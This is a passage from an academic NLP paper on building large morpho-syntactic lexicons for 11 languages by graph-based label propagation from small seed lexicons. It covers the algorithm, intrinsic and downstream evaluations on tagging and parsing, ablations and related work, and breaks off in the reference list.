model. But this leads to slower runtimes and sparser learning. We leave as future work extensions to full paradigm pre- diction. Our framework has three critical components, each described below: (1) model estimation, i.e., learning θ; (2) label propagation to U; and option- ally (3) paradigm projection to known valid morpho- logical paradigms. The overall procedure is illus- trated in Figure 2 and made concrete in Algorithm 1. 3.1 Model Estimation We estimate all individual elements of an attribute vector using eq. 1. We define loss as the squared loss between the empirical and observed attribute vectors 4 Data: W, L, U, A, F, P Result: θ, labeled U // model estimation 1 while not convergence do 2 for w ∈L do 3 loss ←‖aw − âw‖22 4 Update θ using ∂loss ∂θ // label propagation 5 while not convergence do 6 for w ∈U do 7 aw ← âw // paradigm projection 8 for w ∈U do 9 mindist ←∞, closest ←∅ 10 for p ∈P do 11 dist ←‖aw −p‖22 12 if dist < mindist then 13 mindist ← dist, closest ← p 14 aw ← closest Algorithm 1: Graph-based semi-supervised label propagation algorithm. on every labeled node in the graph, thus the total loss can be computed as: ∑ w∈L ‖aw − âw‖22 (2) We train the edge feature weights θ by minimiz- ing the loss function in eq. 2. In this step, we only use labeled nodes and the edge connections between labeled nodes. As such, this is strictly a supervised learning setup. We minimize the loss function using online adaptive gradient descent (Duchi et al., 2011) with `2 regularization on the feature weights θ. This is the first step in Algorithm 1 (lines 1–4). 3.2 Label Propagation In the second step, we use the learned weights of the edge features to estimate the attribute val- ues over unlabeled nodes iteratively. The attribute vector of all unlabeled words is initialized to null, ∀w ∈ U,aw = 〈0,0, . . . ,0〉. In every iteration, an unlabeled node estimates its empirical attributes by looking at the corresponding attributes of its labeled and unlabeled neighbors using eq. 1, thus this is the semi-supervised step. We stop after the squared euclidean distance between the attribute vectors at two consecutive iterations for a node becomes less than 0.1 (averaged over all unlabeled nodes). This is the second step in Algorithm 1 (lines 5–7). After convergence, we can directly obtain attributes for a word by thresholding: a word w is said to possess an attribute ai if ai,w > 0. 3.3 Paradigm Projection Since a word can be labeled with multiple lexical at- tributes, this is a multi-label classification problem. For such a task, several advanced methods that take into account the correlation between attributes have been proposed (Ghamrawi and McCallum, 2005; Tsoumakas and Katakis, 2006; Fürnkranz et al., 2008; Read et al., 2011), here we have adopted the binary relevance method which trains a classi- fier for every attribute independently of the other at- tributes, for its simplicity (Godbole and Sarawagi, 2004; Zhang and Zhou, 2005). However, as the decision for the presence of an attribute over a word is independent of all the other attributes, the final set of attributes obtained for a word in §3.2 might not be a valid paradigm.6 For ex- ample, a word cannot only exhibit the two attributes POS:NOUN and TENSE:PAST, since the presence of the tense attribute implies POS:VERB should also be true. Further, we want to utilize the inherent correlations between attribute labels to obtain bet- ter solutions. We thus present an alternative, simpler method to account for this problem. To ensure that we obtain a valid attribute paradigm, we project the empirical attribute vector obtained after propagation to the space of all valid paradigms. We first collect all observed and thus valid at- tribute paradigms from the seed lexicon (P = {aw|w ∈ L}). We replace the empirical at- tribute vector obtained in §3.2 by a valid attribute paradigm vector which is nearest to it according to euclidean distance. This projection step is inspired from the decoding step in label-space transforma- tion approaches to multilabel classification (Hsu et al., 2009; Ferng and Lin, 2011; Zhang and Schnei- der, 2011). This is the last step in Algorithm 1 (lines 8–14). We investigate for each language if paradigm 6A paradigm is defined as a set of attributes. 5 |L| |W| |E| |A| |P| Prop (k) (k) (m) (k) eu 3.4 130 13 83 811 118 bg 8.1 309 27 57 53 285 hr 6.9 253 26 51 862 251 cs 58.5 507 51 122 4,789 403 da 5.9 259 26 61 352 246 en 4.1 1,006 100 50 412 976 fi 14.4 372 30 100 2,025 251 el 3.9 358 26 40 409 236 hu 1.9 451 25 85 490 245 it 8.5 510 28 52 568 239 sv 4.8 305 26 41 265 268 Table 2: Graph statistics for different languages, showing the approximate number of labeled seed nodes (|L|), la- beled and unlabeled nodes (|W|), edges between words (|E|), the number of unique attributes (|A|), attribute paradigms (|P|) and size of the constructed lexicon (Prop). k: thousands, m: millions. projection is helpful (§4.1). 4 Intrinsic Evaluation To ascertain how our graph-propagation framework predicts morphological attributes for words, we pro- vide an intrinsic evaluation where we compare pre- dicted attributes to gold lexicons that have been ei- ther read off from a treebank or derived manually. 4.1 Dependency Treebank Lexicons The universal dependency treebank (McDonald et al., 2013; De Marneffe et al., 2014; Agić et al., 2015) contains dependency annotations for sentences and morpho-syntactic annotations for words in context for a number of languages.7 A word can display dif- ferent attributes depending on its role in a sentence. In order to create morpho-syntactic lexicon for ev- ery language, we take the union of all the attributes that the word realizes in the entire treebank. Al- though, it is possible that this lexicon might not con- tain all realizable attributes if a particular attribute or paradigm is not seen in the treebank (we address this issue in §4.2). The utility of evaluating against treebank derived lexicons is that it allows us to eval- uate on a large set of languages. In particular, in the universal dependency treebanks v1.1 (Agić et al., 7We use version 1.1 released in May 2015. 2015), 11 diverse languages contain the morphology layer, including Romance, Germanic and Slavic lan- guages plus isolates like Basque and Greek. We use the train/dev/test set of the treebank to cre- ate training (seed),8 development and test lexicons for each language. We exclude words from the dev and test lexicon that have been seen in seed lexicon. For every language, we create a graph with the fea- tures described in §2 with words in the seed lexicon as labeled nodes. The words from development and test set are included as unlabeled nodes for the prop- agation stage.9 Table 2 shows statistics about the constructed graph for different languages.10 We perform feature selection and hyperparame- ter tuning by optimizing prediction on words in the development lexicon and then report results on the test lexicon. The decision whether paradigm projec- tion (§3.3) is useful or not is also taken by tuning performance on the development lexicon. Table 3 shows the features that were selected for each lan- guage. Now, for every word in the test lexicon we obtain predicted lexical attributes from the graph. For a given attribute, we count the number of words for which it was correctly predicted (true positive), wrongly predicted (false positive) and not predicted (false negative). Aggregating these counts over all attributes (A), we compute the micro-averaged F1 score and achieve 74.3% on an average across 11 languages (cf. Table 4). Note that this systemati- cally underestimates performance due to the effect of missing attributes/paradigms that were not ob- served in the treebank. Propagated Lexicons. The last column in Table 2 shows the number of words in the propagated lexi- con, and the first column shows the number of words in the seed lexicon. The ratio of the size of propa- gated and seed lexicon is different across languages, which presumably depends on how densely con- nected each language’s graph is. For example, for 8We only include those words in the seed lexicon that occur at least twice in the training set of the treebank. 9Words from the news corpus used for word clustering are also used as unlabeled nodes. 10Note that the size of the constructed lexicon (cf. Table 2) is always less than or equal to the total number of unlabeled nodes in the graph because some unlabeled nodes are not able to collect enough mass for acquiring an attribute i.e, ∀a ∈ A : aw < 0 and thus they remain unlabeled (cf. §3.2). 6 Clus Suffix Prefix MorphTrans Proj eu X X X bg X X hr X X X cs X X X X X da X X X en X X X fi X X el X X X X hu X X X it X X X sv X X X Table 3: Features selected and the decision of paradigm projection (Proj) tuned on the development lexicon for each language. Xdenotes a selected feature. English the propagated lexicon is around 240 times larger than the seed lexicon, whereas for Czech, its 8 times larger. We can individually tune how densely connected graph we want for each language depend- ing on the seed size and feature sparsity, which we leave for future work. Selected Edge Features. The features most fre- quently selected across all the languages are the word cluster and the surface morphological transfor- mation features. This essentially translates to hav- ing a graph that consists of small connected com- ponents of words having the same lemma (discov- ered in an unsupervised manner) with semantic links connecting such components using word cluster fea- tures. Suffix features are useful for highly inflected languages like Czech and Greek, while the prefix feature is only useful for Czech. Overall, the se- lected edge features for different languages corre- spond well to the morphological structure of these languages (Dryer, 2013). Corpus Baseline. We compare our results to a corpus-based method of obtaining morpho-syntactic lexicons. We hypothesize that if we use a morpho- logical tagger of reasonable quality to tag the entire wikipedia corpus of a language and take the union of all the attributes for a word type across all its occur- rences in the corpus, then we can acquire all possible attributes for a given word. Hence, producing a lex- icon of reasonable quality. Moore (2015) used this technique to obtain a high quality tag dictionary for words Corpus Propagation eu 3409 54.0 57.5 bg 2453 66.4 73.6 hr 1054 69.7 71.6 cs 14532 79.1 80.8 da 1059 68.2 78.1 en 3142 57.2 72.0 fi 2481 58.2 68.2 el 1093 72.2 82.4 hu 1004 64.9 70.9 it 1244 78.8 81.7 sv 3134 69.8 80.7 avg. 3146 67.1 74.3 Table 4: Micro-averaged F1 score (%) for prediction of lexical attributes on the test set using our propagation algorithm (Propagation) and the corpus-based baseline (Corpus). Also, shown are the no. of words in test set. words F1 cs 115,218 87.5 fi 39,856 71.9 hu 135,386 79.7 avg. 96,820 79.7 Table 5: Micro-averaged F1 score (%) for prediction of lexical attributes on the test lexicon of human-curated lexicons. POS-tagging. We thus train a morphological tagger (detail in §5.1) on the training portion of the depen- dency treebank and use it to tag the entire wikipedia corpus. For every word, we add an attribute to the lexicon if it has been seen at least k times for the word in the corpus, where k ∈ [2,20]. This thresh- old on the frequency of the word-attribute pair helps prevent noisy judgements. We tune k for each lan- guage on the development set and report results on the test set in Table 4. We call this method the Cor- pus baseline. It can be seen that for every language we outperform this baseline, which on average has an F1 score of 67.1%. 4.2 Manually Curated Lexicons We have now showed that its possible to automat- ically construct large lexicons from smaller seed lexicons. However, the seed lexicons used in §4.1 have been artifically constructed from aggregating attributes of word types over the treebank. Thus, it 7 word exchange cluster∗ lowercase(word) capitalization {1,2,3}-g suffix∗ digit {1,2,3}-g prefix∗ punctuation Table 6: Features used to train the morphological tagger on the universal dependency treebank. ∗:on for word off- sets {-2, -1, 0, 1, 2}. Conjunctions of the above are also included. can be argued that these constructed lexicons might not be complete i.e, the lexicon might not exhibit all possible attributes for a given word. On the other hand, manually curated lexicons are unavailable for many languages, inhibiting proper evaluation. To test the utility of our approach on manually cu- rated lexicons, we investigate publicly available lex- icons for Finnish (Pirinen, 2011), Czech (Hajič and Hladká, 1998) and Hungarian (Trón et al., 2006). We eliminate numbers and punctuation from all lex- icons. For each of these languages, we select 10000 words for training and the rest of the word types for evaluation. We train models obtained in §4.1 for a given language using suffix, brown and morpholog- ical transformation features with paradigm projec- tion. The only difference is the source of the seed lexicon and test set. Results are reported in Table 5 averaged over 10 different randomly selected seed set for every language. For each language we ob- tain more than 70% F1 score and on an average ob- tain 79.7%. Critically, the F1 score on human cu- rated lexicons is higher for each language than the treebank constructed lexicons, in some cases as high as 9% absolute. This shows that the average 74.3% F1 score across all 11 languages is likely underesti- mated. 5 Extrinsic Evaluation We now show that the automatically generated lex- icons provide informative features that are useful in two downstream NLP tasks: morphological tagging (§5.1) and syntactic dependency parsing (§5.2). 5.1 Morphological Tagging Morphological tagging is the task of assigning a morphological reading to a token in context. The morphological reading consists of features such as part of speech, case, gender, person, tense etc. None Seed Propagation eu 84.1 84.4 85.2 bg 94.2 94.6 95.9 hr 92.5 93.6 93.2 cs 96.8 97.1 97.1 da 96.4 97.1 97.3 en 94.4 94.7 94.8 fi 92.8 93.6 94.0 el 93.4 94.6 94.2 hu 91.7 92.3 93.5 it 96.8 97.1 97.1 sv 95.4 96.5 96.5 avg. 93.5 94.2 94.5 Table 7: Macro-averaged F1 score (%) for morphologi- cal tagging: without using any lexicon (None), with seed lexicon (Seed), with propagated lexicon (Propagation). (Oflazer and Kuruöz, 1994; Hajič and Hladká, 1998). The model we use is a standard atomic se- quence classifier, that classifies the morphological bundle for each word independent of the others (with the exception of features derived from these words). Specifically, we use a linear SVM model classifier with hand tuned features. This is similar to com- monly used analyzers like SVMTagger (Giménez and Marquez, 2004) and MateTagger (Bohnet and Nivre, 2012). Our taggers are trained in a language independent manner (Hajič, 2000; Smith et al., 2005; Müller et al., 2013). The list of features used in training the tagger are listed in Table 6. In addition to the stan- dard features, we use the morpho-syntactic attributes present in the lexicon for every word as features in the tagger. As shown in Müller and Schuetze (2015), this is typically the most important feature for mor- phological tagging, even more useful than clusters or word embeddings. While predicting the contex- tual morphological tags for a given word, the mor- phological attributes present in the lexicon for the current word, the previous word and the next word are used as features. We use the same 11 languages from the univer- sal dependency treebanks (Agić et al., 2015) that contain morphological tags to train and evaluate the morphological taggers. We use the pre-specified train/dev/test splits that come with the data. Ta- ble 7 shows the macro-averaged F1 score over all 8 None Seed Propagation eu 60.5 62.3 62.9 bg 78.3 78.8 79.3 hr 72.8 74.7 74.7 cs 78.3 78.4 78.4 da 67.5 69.4 70.1 en 74.4 74.1 74.4 fi 66.1 67.4 67.9 el 75.0 75.6 75.8 hu 67.6 69.0 71.1 it 82.4 82.8 83.1 sv 69.7 70.1 70.1 avg. 72.0 73.0 73.5 Table 8: Labeled accuracy score (LAS, %) for depen- dency parsing: without using any lexicon (None), with seed (Seed), with propagated lexicon (Propagation). attributes for each language on the test lexicon. The three columns show the F1 score of the tagger when no lexicon is used; when the seed lexicon derived from the training data is used; and when label prop- agation is applied. Overall, using lexicons provides a significant im- provement in accuracy, even when just using the seed lexicon. For 9 out of 11 languages, the high- est accuracy is obtained using the lexicon derived from graph propagation. In some cases the gain is quite substantial, e.g., 94.6% → 95.9% for Bulgar- ian. Overall there is 1.0% and 0.3% absolute im- provement over the baseline and seed resp., which corresponds roughly to a 15% and 5% relative re- duction in error. It is not surprising that the seed lexicon performs on par with the derived lexicon for some languages, as it is derived from the train- ing corpus, which likely contains the most frequent words of the language. 5.2 Dependency Parsing We train dependency parsers for the same 11 uni- versal dependency treebanks that contain the mor- phological layer (Agić et al., 2015). We again use the supplied train/dev/test split of the dependency treebank to develop the models. Our parsing model is the transition-based parsing system of Zhang and Nivre (2011) with identical features and a beam of size 8. We augment the features of Zhang and Nivre Figure 3: Micro-average F1 score on test lexicon while using varying seed sizes for cs, hu and fi. (2011) in two ways: using the context-independent morphological attributes present in the different lex- icons; and using the corresponding morphological taggers from §5.1 to generate context-dependent at- tributes. For each of the above two kinds of features, we fire the attributes for the word on top of the stack and the two words on at the front of the buffer. Ad- ditionally we take the cross product of these features between the word on the top of the stack and at the front of the buffer. Table 8 shows the labeled accuracy score (LAS) for all languages. Overall, the generated lexicon gives an improvement of absolute 1.5% point over the baseline (5.3% relative reduction in error) and 0.5% over the seed lexicon on an average across 11 languages. Critically this improvement holds for 10/11 languages over the baseline and 8/11 lan- guages over the system that uses seed lexicon only. 6 Further Analysis In this section we further investigate our model and results in detail. Size of seed lexicon. We first test how the size of the seed lexicon affects performance of attribute prediction on the test set. We use the manually constructed lexicons described in §4.2 for experi- ments. For each language, instead of using the full seed lexicon of 10000 words, we construct sub- sets of this lexicon by taking 1000 and 5000 ran- domly sampled words. We then train models ob- tained in §4.1 on these lexicons and plot the perfor- mance on the test set in Figure 3. On average across 9 Word Attributes en study (seed) POS:Verb, VForm:Fin, Mood:Ind, Tense:Pres, Num:Sing, POS:Noun studied POS:Verb, VForm:Fin, Mood:Ind, Tense:Past, VForm:Part taught POS:Verb, VForm:Fin, Mood:Ind, Tense:Past, VForm:Part, Voice:Pass it tavola (seed) POS:Noun, Gender:Fem, Num:Sing tavoli POS:Noun, Gender:Masc, Num:Plur divano POS:Noun, Gender:Masc, Num:Sing Table 9: Attributes induced for words which are semantically or syntactically related to a word in the seed lexicon for English and Italian. VFORM:GER NUM:PLUR Clus:105 + Clus:19 + Clus:77 + Clus:97 + Clus:44 + Clus:177 + suffix:ing:{null} - suffix:ies:y - suffix:ping:{null} - suffix:gs:g - suffix:ing:er - suffix:ons:on - Table 10: Highest (upper half) and lowest (lower half) weighted features (with their sign) for predicting a given attribute of English words. three languages, we observe that the absolute perfor- mance improvement from 1000 to 5000 seed words is ≈10% whereas it reduces to ≈2% from 5000 to 10000 words. Feature analysis. Table 10 shows the highest and the lowest weighted features for predicting a given attribute of English words. The highest weighted features for both VFORM:GER and NUM:PLUR are word clusters, indicating that word clusters exhibit strong syntactic and semantic coherence. More interestingly, it can be seen that for predicting VFORM:GER i.e, continuous verb forms, the lowest weighted features are those morphological transfor- mations that substitute “ing” with something else. Thus, if there exists an edge between the words studying and study, containing the feature: suf- fix:ing:{null}, the model would correctly predict that studying is VFORM:GER as study is not so and the negative feature weight can flip the label values. The same observation holds true for NUM:PLUR. Feature ablation. One key question is which of the features in our graph are important for project- ing morphological attribute-values. Table 3 suggests that this is language specific, which is intuitive, as cs hu fi S + C + MT 87.5 79.9 71.6 S + C 86.5 78.8 68.2 S + MT 85.7 77.0 68.7 C + MT 75.7 57.4 62.2 S + C + MT + P 86.7 66.0 61.3 Table 11: Feature ablation study for induced lexicons evaluated on manually curated gold lexicons. Reported scores are micro-averaged F1 score (%) for prediction of lexical attributes. S = suffix; P = prefix; C = clusters; and MT = morphological transformations. morphology can be represented more or less regu- larly through the surface form depending on the lan- guage. To understand this, we did a feature ablation study for the three languages with manually curated lexicons (§4.2) using the same feature set as before: clusters, suffix and morphological transformations with paradigm projection. We then leave out each feature to measure how performance drops. Unlike §4.2, we do not average over 10 runs but use a sin- gle static graph where features (edges) are added or removed as necessary. Table 11 contains the results. Critically, all fea- tures are required for top accuracy across all lan- guages and leaving out suffix features has the most detrimental effect. This is not surprising considering all three language primarily express morphological properties via suffixes. Furthermore, suffix features help to connect the graph and assist label propaga- tion. Note that the importance of suffix features here is in contrast to the evaluation on treebank derived lexicons in §4.1, where suffix features were only se- lected for 4 out of 11 languages based on the devel- opment data (Table 3), and not for Hungarian and Finnish. This could be due to the nature of the lex- 10 icons derived from treebanks versus complete lexi- cons constructed by humans. Additionally, we also added back prefix features and found that for all languages, this resulted in a drop in accuracy, particularly for Finnish and Hun- garian. The primary reason for this is that prefix fea- tures often create spurious edges in the graph. This in and of itself is not a problem for our model, as the edge weights should learn to discount this feature. However, the fact that we sample edges to make in- ference tractable means that more informative edges could be dropped in favor of those that are only con- nected via a prefix features. Prediction examples. Table 9 shows examples of predictions made by our model for English and Ital- ian. For each language, we first select a random word from the seed lexicon, then we pick one syn- tactic and one semantically related word to the se- lected word from the set of unlabeled words. For e.g., in Italian tavola means table, whereas tavoli is the plural form and divano means sofa. We correctly identify attributes for these words. 7 Related Work We now review the areas of related work. Lexicon generation. Eskander et al. (2013) con- struct morpho-syntactic lexicons by incrementally merging inflectional classes with shared morpholog- ical features. Natural language lexicons have often been created from smaller seed lexcions using var- ious methods. Thelen and Riloff (2002) use pat- terns extracted over a large corpus to learn semantic lexicons from smaller seed lexicons using bootstrap- ping. Alfonseca et al. (2010) use distributional simi- larity scores across instances to propagate attributes using random walks over a graph. Das and Smith (2012) learn potential semantic frames for unknown predicates by expanding a seed frame lexicon. Sen- timent lexicons containing semantic polarity labels for words and phrases have been created using boot- strapping and graph-based learning (Banea et al., 2008; Mohammad et al., 2009; Velikovich et al., 2010; Takamura et al., 2007; Lu et al., 2011). Graph-based learning. In general, graph-based semi-supervised learning is heavily used in NLP (Talukdar and Cohen, 2013; Subramanya and Taluk- dar, 2014). Graph-based learning has been used for class-instance acquisition (Talukdar and Pereira, 2010), text classification (Subramanya and Bilmes, 2008), summarization (Erkan and Radev, 2004), structured prediction problems (Subramanya et al., 2010; Das and Petrov, 2011; Garrette et al., 2013) etc. Our work differs from most of these approaches in that we specifically learn how different features shared between the nodes can correspond to either the propagation of an attribute or an inversion of the attribute value (cf. equ 1). In terms of the ca- pability of inverting an attribute value, our method is close to Goldberg et al. (2007), who present a framework to include dissimilarity between nodes and Talukdar et al. (2012), who learn which edges can be excluded for label propagation. In terms of featurizing the edges, our work resembles previous work which measured similarity between nodes in terms of similarity between the feature types that they share (Muthukrishnan et al., 2011; Saluja and Navrátil, 2013). Our work is also related to graph- based metric learning, where the objective is to learn a suitable distance metric between the nodes of a graph for solving a given problem (Weinberger et al., 2005; Dhillon et al., 2012). Morphology. High morphological complexity ex- acerbates the problem of feature sparsity in many NLP applications and leads to poor estimation of model parameters, emphasizing the need of mor- phological analysis. Morphological analysis en- compasses fields like morphological segmentation (Creutz and Lagus, 2007; Demberg, 2007; Snyder and Barzilay, 2008; Poon et al., 2009; Narasimhan et al., 2015), and inflection generation (Yarowsky and Wicentowski, 2000; Wicentowski, 2004). Such models of segmentation and inflection generation are used to better understand the meaning and re- lations between words. Our task is complementary to the task of morphological paradigm generation. Paradigm generation requires generating all possible morphological forms of a given base-form according to different linguistic transformations (Dreyer and Eisner, 2011; Durrett and DeNero, 2013; Ahlberg et al., 2014; Ahlberg et al., 2015; Nicolai et al., 2015; Faruqui et al., 2016), whereas our task requires iden- tifying linguistic transformations between two dif- 11 ferent word forms. Low-resourced languages. Our algorithm can be used to generate morpho-syntactic lexicons for low- resourced languages, where the seed lexicon can be constructed, for example, using crowdsourcing (Callison-Burch and Dredze, 2010; Irvine and Kle- mentiev, 2010). Morpho-syntactic resources have been developed for east-european languages like Slovene (Dzeroski et al., 2000; Erjavec, 2004), Bulgarian (Simov et al., 2004) and highly agglu- tinative languages like Turkish (Sak et al., 2008). Morpho-syntactic lexicons are crucial components in acousting modeling and automatic speech recog- nition, where they have been developed for low- resourced languages (Huet et al., 2008; Besacier et al., 2014). One alternative method to extract morphosyntac- tic lexicons is via parallel data (Das and Petrov, 2011). However, such methods assume that both the source and target langauges are isomorphic with respect to morphology. This can be the case with attributes like coarse part-of-speech or case, but is rarely true for other attributes like gender, which is very language specific. 8 Future Work There are three major ways in which the current model can be possibly improved. Joint learning and propagation. In the current model, we are first learning the weights in a su- pervised manner (§3.1) and then propagating labels across nodes in a semi-supervised step with fixed feature weights (§3.2). These can also be performed jointly: perform one iteration of weight learning, propagate labels using these weights, perform an- other iteration of weight learning assuming empir- ical labels as gold labels and continue to learn and propagate until convergence. This joint learning would be slower than the current approach as prop- agating labels across the graph is an expensive step. Multi-label classifcation. We are currently using the binary relevance method which trains a binary classifier for every attribute independently (Godbole and Sarawagi, 2004; Zhang and Zhou, 2005) with paradigm projection as a post-processing step (§3.3). Thus we are accounting for attribute correlations only at the end. We can instead model such cor- relations as constraints during the learning step to obtain better solutions (Ghamrawi and McCallum, 2005; Tsoumakas and Katakis, 2006; Fürnkranz et al., 2008; Read et al., 2011). Richer feature set. In addition our model can ben- efit from a richer set of features. Word embeddings can be used to connect word node which are similar in meaning (Mikolov et al., 2013). We can use ex- isting morphological segmentation tools to discover the morpheme and inflections of a word to connect it to word with similar inflections which might be bet- ter than the crude suffix or prefix features. We can also use rich lexical resources like Wiktionary11 to extract relations between words that can be encoded on our graph edges. 9 Conclusion We have presented a graph-based semi-supervised method to construct large annotated morpho- syntactic lexicons from small seed lexicons. Our method is language independent and we have con- structed lexicons for 11 different languages. We showed that the lexicons thus constructed help im- prove performance in morphological tagging and de- pendency parsing, when used as features. Acknowledgement This work was performed when the first author was an intern at Google. We thank action editor Alexander Clark, and the three anonymous review- ers for their helpful suggestions in preparing the manuscript. We thank David Talbot for his help in developing the propagation framework and help- ful discussions about evaluation. We thank Avneesh Saluja, Chris Dyer and Partha Pratim Talukdar for their comments on drafts of this paper. References Željko Agić, Maria Jesus Aranzabe, Aitziber Atutxa, Cristina Bosco, Jinho Choi, Marie-Catherine de Marn- effe, Timothy Dozat, Richárd Farkas, Jennifer Foster, Filip Ginter, Iakes Goenaga, Koldo Gojenola, Yoav Goldberg, Jan Hajič, Anders Trærup Johannsen, Jenna 11https://www.wiktionary.org/ 12 Kanerva, Juha Kuokkala, Veronika Laippala, Alessan- dro Lenci, Krister Lindén, Nikola Ljubešić, Teresa Lynn, Christopher Manning, Héctor Alonso Martı́nez, Ryan McDonald, Anna Missilä, Simonetta Monte- magni, Joakim Nivre, Hanna Nurmi, Petya Osenova, Slav Petrov, Jussi Piitulainen, Barbara Plank, Prokopis Prokopidis, Sampo Pyysalo, Wolfgang Seeker, Moj- gan Seraji, Natalia Silveira, Maria Simi, Kiril Simov, Aaron Smith, Reut Tsarfaty, Veronika Vincze, and Daniel Zeman. 2015. Universal dependencies 1.1. LINDAT/CLARIN digital library at Institute of Formal and Applied Linguistics, Charles University in Prague. Malin Ahlberg, Markus Forsberg, and Mans Hulden. 2014. Semi-supervised learning of morphological paradigms and lexicons. In Proc. of EACL. Malin Ahlberg, Markus Forsberg, and Mans Hulden. 2015. Paradigm classification in supervised learning of morphology. In Proc. of NAACL. Enrique Alfonseca, Marius Pasca, and Enrique Robledo- Arnuncio. 2010. Acquisition of instance attributes via labeled and related instances. In Proc. of SIGIR. Ebru Arisoy, Murat Saraçlar, Brian Roark, and Izhak Shafran. 2010. Syntactic and sub-lexical features for Turkish discriminative language models. In Proc. of ICASSP. Carmen Banea, Janyce M. Wiebe, and Rada Mihalcea. 2008. A bootstrapping method for building subjectiv- ity lexicons for languages with scarce resources. In Proc. of LREC. Yoshua Bengio, Olivier Delalleau, and Nicolas Le Roux. 2006. Label propagation and quadratic criterion. In Semi-Supervised Learning. MIT Press. Laurent Besacier, Etienne Barnard, Alexey Karpov, and Tanja Schultz. 2014. Automatic speech recogni- tion for under-resourced languages: A survey. Speech Communication, 56:85–100. Bernd Bohnet and Joakim Nivre. 2012. A transition- based system for joint part-of-speech tagging and la- beled non-projective dependency parsing. In Proc. of EMNLP. Chris Callison-Burch and Mark Dredze. 2010. Creat- ing speech and language data with amazon’s mechan- ical turk. In Proc. of NAACL Workshop on Creating Speech and Language Data with Amazon’s Mechani- cal Turk. Alexander Clark. 2003. Combining distributional and morphological information for part of speech induc- tion. In Proc. of EACL. Mathias Creutz and Krista Lagus. 2007. Unsupervised models for morpheme segmentation and morphology learning. ACM Transactions on Speech and Language Processing (TSLP), 4(1):3. Dipanjan Das and Slav Petrov. 2011. Unsupervised part- of-speech tagging with bilingual graph-based projec- tions. In Proc. of ACL. Dipanjan Das and Noah A. Smith. 2012. Graph-based lexicon expansion with sparsity-inducing penalties. In Proc. of NAACL. Marie-Catherine De Marneffe, Timothy Dozat, Natalia Silveira, Katri Haverinen, Filip Ginter, Joakim Nivre, and Christopher D. Manning. 2014. Universal stan- ford dependencies: A cross-linguistic typology. In Proceedings of LREC. Vera Demberg. 2007. A language-independent unsuper- vised model for morphological segmentation. In Proc. of ACL. Pascal Denis and Benoı̂t Sagot. 2009. Coupling an anno- tated corpus and a morphosyntactic lexicon for state- of-the-art POS tagging with less human effort. In Proc. of PACLIC. Paramveer S. Dhillon, Partha Talukdar, and Koby Cram- mer. 2012. Metric learning for graph-based domain adaptation. In Proc. of COLING. Markus Dreyer and Jason Eisner. 2011. Discover- ing morphological paradigms from plain text using a Dirichlet process mixture model. In Proc. of EMNLP. Matthew S. Dryer. 2013. Prefixing vs. Suffixing in Inflec- tional Morphology. Max Planck Institute for Evolu- tionary Anthropology. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. The Journal of Machine Learning Research, 12:2121–2159. Kais Dukes and Nizar Habash. 2010. Morphological annotation of quranic Arabic. In Proc. of LREC. Greg Durrett and John DeNero. 2013. Supervised learn- ing of complete morphological paradigms. In Proc. of NAACL. Saso Dzeroski, Tomaz Erjavec, and Jakub Zavrel. 2000. Morphosyntactic tagging of Slovene: Evaluating tag- gers and tagsets. In Proc. of LREC. Tomaz Erjavec. 2004. Multext-east version 3: Multilin- gual morphosyntactic specifications, lexicons and cor- pora. In Proc. of LREC. Günes Erkan and Dragomir R. Radev. 2004. Lexrank: Graph-based lexical centrality as salience in text sum- marization. Journal of Artificial Intelligence Re- search, 22(1):457–479. Ramy Eskander, Nizar Habash, and Owen Rambow. 2013. Automatic extraction of morphological lexicons from morphologically annotated corpora. In Proc. of EMNLP. Manaal Faruqui and Sebastian Padó. 2010. Training and evaluating a German named entity recognizer with se- mantic generalization. In Proc. of KONVENS. 13 Manaal Faruqui, Yulia Tsvetkov, Graham Neubig, and Chris Dyer. 2016. Morphological inflection gener- ation using character sequence to sequence learning. arXiv:1104.2086. Chun-Sung Ferng and Hsuan-Tien Lin. 2011. Multi- label classification with error-correcting codes. In Proc. of ACML. Johannes Fürnkranz, Eyke Hüllermeier, Eneldo Loza Mencı́a, and Klaus Brinker. 2008. Multilabel classifi- cation via calibrated label ranking. Machine learning, 73(2):133–153. Dan Garrette, Jason Mielens, and Jason Baldridge. 2013. Real-world semi-supervised learning of POS-taggers for low-resource languages. In Proc. of ACL. Nadia Ghamrawi and Andrew McCallum. 2005. Collec- tive multi-label classification. In Proc. of CIKM. Jesús Giménez and Lluı́s Marquez. 2004. Svmtool: A general POS tagger generator based on support vector machines. In Proc. of LREC. Shantanu Godbole and Sunita Sarawagi. 2004. Discrim- inative methods for multi-labeled classification. In Proc. of KDD. Andrew B. Goldberg, Xiaojin Zhu, and Stephen J. Wright. 2007. Dissimilarity in graph-based semi- supervised classification. In Proc. of AISTATS. Yoav Goldberg, Reut Tsarfaty, Meni Adler, and Michael Elhadad. 2009. Enhancing unlexicalized parsing per- formance using a wide coverage lexicon, fuzzy tag-set mapping, and EM-HMM-based lexical probabilities. In Proc. of EACL. Spence Green and John DeNero. 2012. A class-based agreement model for generating accurately inflected translations. In Proc. of ACL. Jan Hajič and Barbora Hladká. 1998. Tagging inflective languages: Prediction of morphological categories for a rich, structured tagset. In Proc. of COLING. Jan Hajič. 2000. Morphological tagging: Data vs. dictio- naries. In Proc. of NAACL. Daniel Hsu, Sham Kakade, John Langford, and Tong Zhang. 2009. Multi-label prediction via compressed sensing. In Proc. of NIPS. Stéphane Huet, Guillaume Gravier, and Pascale Sébillot. 2008. Morphosyntactic resources for automatic speech recognition. In Proc. of LREC. Ann Irvine and Alexandre Klementiev. 2010. Using me- chanical turk to annotate lexicons for less commonly used languages. In Proc. of NAACL Workshop on Cre- ating Speech and Language Data with Amazon’s Me- chanical Turk. Ernst Ising. 1925. Beitrag zur theorie des ferromag- netismus. Zeitschrift für Physik A Hadrons and Nu- clei, 31(1):253–258. Reinhard Kneser and Hermann Ney. 1993. Improved clustering techniques for class-based statistical lan- guage modelling. In Proc. of Eurospeech. Dimitrios Kokkinakis, Maria Toporowska-Gronostaj, and Karin Warmenius. 2000. Annotating, disambiguat- ing & automatically extending the coverage of the Swedish SIMPLE lexicon. In Proc. of LREC. Terry Koo, Xavier Carreras, and Michael Collins. 2008. Simple semi-supervised dependency parsing. In Proc. of ACL. Sandra Kübler, Ryan McDonald, and Joakim Nivre. 2009. Dependency parsing. Synthesis Lectures on Human Language Technologies. Morgan & Claypool Publishers. Yue Lu, Malu Castellanos, Umeshwar Dayal, and ChengXiang Zhai. 2011. Automatic construction of a context-aware sentiment lexicon: An optimization ap- proach. In Proc. of WWW. Sven Martin, Jörg 